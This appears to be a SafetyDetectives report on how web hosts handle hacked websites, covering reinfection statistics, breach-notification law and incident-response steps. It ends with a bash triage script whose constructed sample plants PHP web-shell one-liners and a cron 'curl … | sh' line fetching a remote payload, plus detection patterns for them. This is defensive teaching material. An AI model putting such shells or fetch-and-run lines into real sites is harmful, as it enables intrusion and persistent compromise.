Roberto Popolizio
Published on: August 13, 2025
No matter what you think (or your web host makes you think), no website is immune to breaches.
Shit happens and you must be ready with a remediation plan.
But what does REALLY happen when a website gets hacked?
Most often, the answer is: nothing useful. Many providers suspend your site, offer no forensics, and leave you scrambling to find (and pay) a third party to fix the mess.
This SafetyDetectives report investigates how web hosting providers approach website remediation, and compares their claims against hard data, expert insights, and real-world case studies.
A big thanks to Fabio Assenzio, CMO at Ergonet, for helping me with this massive study.
Ransomware Reinfection Rates
Many sources report that paying a ransomware demand does not guarantee safety. Paying a ransom, or restoring files from backup, without fixing the way the attacker got in leaves the entry point (and often a leftover backdoor) in place, which is why a second compromise and a second, usually higher, ransom follow so often.
- Cybereason found that about 80% of organizations that paid a ransom were hit again by ransomware soon after.
- In another study 67% of second attacks demanded an even higher ransom.
- Similarly, a Varonis blog cites a survey where “80 percent of victims who submitted a ransom payment experienced another attack soon after”.
Industry experts like CISA’s Eric Goldstein also emphasize that many ransomware incidents go unreported (perhaps only ~25% are ever disclosed), so the figures above may understate the true scale of the problem.
This reinfection rate shows that the underlying vulnerability that caused the breach often never gets fixed.
Web hosts’ accountability in different countries
Let’s look at the rules in the US, Europe and other first-world countries… You would expect them to be at the forefront when it comes to your right to know when shit happens, right?
Think again… In many jurisdictions, web hosting companies may not be legally required to notify customers or regulators of a breach.
In Europe, GDPR Article 33 requires the hosting provider (acting as a data processor) to inform the site owner (the data controller) of a personal-data breach without undue delay. Unless the breach is unlikely to result in a risk to the people whose data was exposed, the website owner must then notify the national supervisory authority within 72 hours of becoming aware of it.
In the US there’s no single federal law covering all personal data breaches, only sector-specific rules. Two examples:
- HIPAA, which covers protected health information, requires covered entities to notify affected individuals “without unreasonable delay” and no later than 60 days after discovery; a host acting as a business associate must notify the covered entity it serves within the same window.
- CIRCIA (Cyber Incident Reporting for Critical Infrastructure Act) will, once its implementing rule is final, require covered critical-infrastructure entities to report “substantial” cyber incidents to CISA within 72 hours; it imposes no duty to notify affected individuals.
Canada, Australia, and Japan have national privacy laws that include breach notification. Timelines vary; the host is often required to notify affected individuals “as soon as feasible” and regulators within a specified deadline.
Takeaway: Outside the EU, there’s no unified accountability rule like GDPR. Breach response depends on where you and your host are, what types of data are involved, and what is written in your contract with the hosting provider.
So what should you expect from your web host?
Reputable web hosting providers include breach clauses in their contracts, develop their own incident response plans, and have all the appropriate certifications (e.g., ISO 27001, SOC 2).
Many large providers do publish incident-response procedures or notify customers internally when their infrastructure is affected, but they stop there. If a hosted website is hijacked, the provider usually offers to suspend the account (to stop abuse) or shut down the site. They may also provide raw server logs, but rarely perform the cleanup themselves except as a paid add-on.
Outsourcing security is very common, especially among large shared-hosting firms. A quick survey of hosting offerings shows that many providers prefer to resell or recommend products from security firms rather than train their own staff.
For example, GoDaddy outsources security to SiteLock and sells it as a paid add-on: customers who want any security at all have to buy it.
This means that after a hack, you may have to hire a third-party cleanup service (e.g. Sucuri, SiteLock, CloudBrackets). That is better than nothing, but it can be costly and risky for the customer, since both the host and a contractor the website owner knows nothing about need to get paid.
Unfortunately, most web hosting firms offer little or no hands-on help when websites are breached. This creates a risky loop: unmaintained, still-compromised sites keep distributing malware indefinitely.
But why? To answer this question, we must look at the economics of web hosting.
Economic Dynamics of Hosting Providers
Low profit margins, high infrastructure costs, and high support demands leave little budget for cutting-edge security or incident response.
New hosts often launch with “crazy discounts” and then fail to turn a profit on them.
A large portion of whatever revenue does come in is spent on infrastructure: about 30% of gross revenue goes into servers and network, leaving roughly $0.70 on the dollar to cover everything else (staff, support, development).
Even at $120/year per customer, a host might afford only one system administrator for roughly 1,400 customers: 1,400 × $120 is about $168,000 gross, or about $118,000 after infrastructure, which is roughly one fully loaded salary. In other words, small per-customer fees leave very little room for high-priced talent.
With such low margins, not much is left to invest in staffing, security training, and tools. Most support teams consist mainly of junior techs, or are outsourced overseas, so support is available 24/7 but the security expertise on offer is limited to basic monitoring.
This explains why small web hosts outsource their remediation. Investing in full-scale incident response teams is feasible only for very large data centers or cloud operators.
So, given that many web hosts are not totally reliable when it comes to website remediation, what can we users do?
Here are some tips from our poll of cybersecurity experts.
Efficacy of Common Post-Breach Advice
Typical “quick fixes” after a website hack, like restoring a backup or running an antivirus scan, are necessary but not sufficient to prevent reinfection.
Restoring a backup without finding the entry point simply reinstates the vulnerable site (and, if the backup was taken after the compromise, the attacker’s backdoor with it). Likewise, running an antivirus or malware scanner without a full analysis may miss web shells, backdoors, rogue cron jobs or rootkits.
What you need is a structured incident-response process for breaches. Key steps include:
- Detection and containment. Confirm the site is compromised, then put it into maintenance/offline mode to prevent further damage. Preserve logs; do not wipe or rebuild anything yet.
- Evidence collection. As CISA’s incident response playbook recommends, capture full memory and disk images of affected servers before touching them. Collect all logs (web server, CMS, authentication, cron). Analyzing these artifacts later is what lets you reconstruct the attacker’s actions and find the entry point.
- Root-cause analysis. Examine logs and file changes. Common techniques include scanning for web shells, checking for newly created admin users, SSH keys or crontabs, and comparing file hashes against a clean version of the site.
- Eradication. Remove all malicious files and code. Because many hacks involve multiple payloads (as Figure 1 suggests), clean up every backdoor, spam script and rogue code fragment, and every unauthorized account or service; one missed backdoor is enough to get reinfected. Rotate all credentials (CMS, database, FTP/SFTP, hosting panel, API keys).
- Recovery. Rebuild or restore the site only after a thorough cleanup, preferably by redeploying from clean sources (tested “golden images” or backups known to predate the compromise). Keep backups offline and verify they were not tampered with.
- Fix the entry point. Identify the vulnerability that enabled the breach and close it: update all software (CMS core, plugins, themes, OS) and apply any firewall or WAF rules needed.
- Lessons learned. Document the incident timeline and report to stakeholders. If laws require it, notify affected users. Update security policies accordingly.
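The root-cause and eradication steps above are the ones site owners most often skip, so here is a small triage script that performs them on a web root. It is an added example written for this page, not code from the original report or from any hosting provider. It builds a constructed sample site under a hypothetical `WEBROOT` (with a hash manifest `BASELINE` and a cron dump `CRONFILE`, both invented names), then runs the three checks the list names: comparing file hashes against a clean baseline, sweeping PHP for web-shell primitives, and looking at cron for persistence. GNU coreutils and grep are assumed.

```shell
#!/usr/bin/env bash
# Added example (not the report's code): post-breach triage of a web root.
# WEBROOT, BASELINE and CRONFILE are hypothetical; the sample site is constructed.
set -eu

WEBROOT="$(mktemp -d)"                 # stands in for /var/www/site
BASELINE="$WEBROOT/.baseline.sha256"   # hash manifest recorded from the clean deploy
CRONFILE="$WEBROOT/.crontab.txt"       # stands in for the output of `crontab -l`
trap 'rm -rf "$WEBROOT"' EXIT

# Record the sha256 of every PHP file, relative to WEBROOT. Run this from a
# known-clean deploy and keep the manifest somewhere the web server cannot write.
record_baseline() {
  (cd "$WEBROOT" && find . -type f -name '*.php' -print0 | sort -z | xargs -0 sha256sum) > "$BASELINE"
}

# Constructed sample: clean deploy, baseline, then the attacker's changes.
setup_sample_site() {
  mkdir -p "$WEBROOT/wp-content/uploads"
  printf '<?php echo "hello"; ?>\n' > "$WEBROOT/index.php"
  printf '<?php define("DB_NAME", "wp"); ?>\n' > "$WEBROOT/wp-config.php"
  record_baseline
  # Attacker: adds a command shell to index.php, drops a second shell in the
  # uploads directory, and installs a cron job that re-fetches the payload.
  # The cron entry is the kind of persistence a "restore from backup" misses.
  printf '<?php echo "hello"; @system($_GET["cmd"]); ?>\n' > "$WEBROOT/index.php"
  printf '<?php eval(base64_decode($_POST["c"])); ?>\n' > "$WEBROOT/wp-content/uploads/.cache.php"
  printf '0 3 * * * /usr/bin/php /var/www/site/wp-cron.php\n' > "$CRONFILE"
  printf '*/5 * * * * curl -s http://203.0.113.7/p.sh | sh\n' >> "$CRONFILE"
}

# Baseline files whose hash no longer matches (modified or deleted).
find_changed_files() {
  (cd "$WEBROOT" && sha256sum -c --quiet "$BASELINE" 2>/dev/null || true) \
    | sed -n 's/: FAILED.*$//p' | sort
}

# PHP files present now that were not in the baseline (dropped by the attacker).
find_new_files() {
  known="$(mktemp)"
  sed 's/^[0-9a-f]*  //' "$BASELINE" | sort > "$known"
  (cd "$WEBROOT" && find . -type f -name '*.php' | sort) | comm -13 "$known" -
  rm -f "$known"
}

# Executable code under an uploads directory is almost never legitimate.
find_php_in_uploads() {
  (cd "$WEBROOT" && find ./wp-content/uploads -type f -name '*.php' | sort)
}

# Static sweep for web-shell primitives. Expect false positives in legitimate
# code; this narrows the list for manual review, it does not replace it.
find_webshell_candidates() {
  (cd "$WEBROOT" && find . -type f -name '*.php' -print0 \
    | xargs -0 grep -lE '(^|[^A-Za-z0-9_])(eval|assert|system|shell_exec|passthru|popen|proc_open|base64_decode)[[:space:]]*\(' \
    | sort)
}

# Persistence check: cron entries that download or decode something and run it.
find_suspicious_cron() {
  grep -E 'curl|wget|base64|/dev/tcp' "$CRONFILE" || true
}

# Print a triage summary; each section is a list for the analyst to review.
triage_report() {
  for check in find_changed_files find_new_files find_php_in_uploads \
               find_webshell_candidates find_suspicious_cron; do
    printf '== %s ==\n' "$check"
    "$check"
  done
}

setup_sample_site
triage_report
```

On the sample site the report flags `./index.php` as changed, `./wp-content/uploads/.cache.php` as new and as a web-shell candidate, and the `curl … | sh` cron line as persistence. Note that the hash check only works if the baseline was taken before the compromise; a manifest recorded from an already-hacked site just certifies the backdoors as "known good", which is the same mistake as restoring a post-compromise backup.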
This report was made in collaboration with Ergonet, one of the top Italian web hosting providers.
Their expertise was crucial for me to decode and understand the nuances behind this data. I could have never done this without their support.
Sources:
Key references include CISA guidelines, Sucuri’s 2023 threat report, ransomware surveys, and multiple cybersecurity experts’ analyses.
https://www.thedfirspot.com/post/investigating-a-compromised-web-server
https://www.hiscoxgroup.com/news/press-releases/2022/08-11-22
https://www.cisa.gov/sites/default/files/2024-08/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf
https://www.cybereason.com/press/cybereason-ransomware-true-cost-to-business-study-reveals-organizations-pay-multiple-ransom-demands
https://www.varonis.com/blog/ransomware-statistics
https://www.techmonitor.ai/technology/cybersecurity/record-breaking-ransomware-attempt-spike
https://websea.org/hosting-provider-legally-obliged-to-reveal-a-breach-of-security/
https://www.emsisoft.com/en/blog/25138/hacked-abandoned-webservers-the-invisible-helpers-for-malware-authors/
https://gdpr-info.eu/art-33-gdpr/
https://www.hugheshubbard.com/news/recent-developments-u-s-data-breach-reporting-obligations
https://www.sitelock.com/resources/case-studies/
https://www.cisa.gov/stopransomware/ransomware-guide
https://www.threatdown.com/blog/ransomware-reinfections-on-the-rise-from-improper-remediation/
https://www.howthemarketworks.com/the-economics-of-web-hosting-explained/
https://www.milesweb.com/blog/hosting/why-people-quit-web-hosting-business/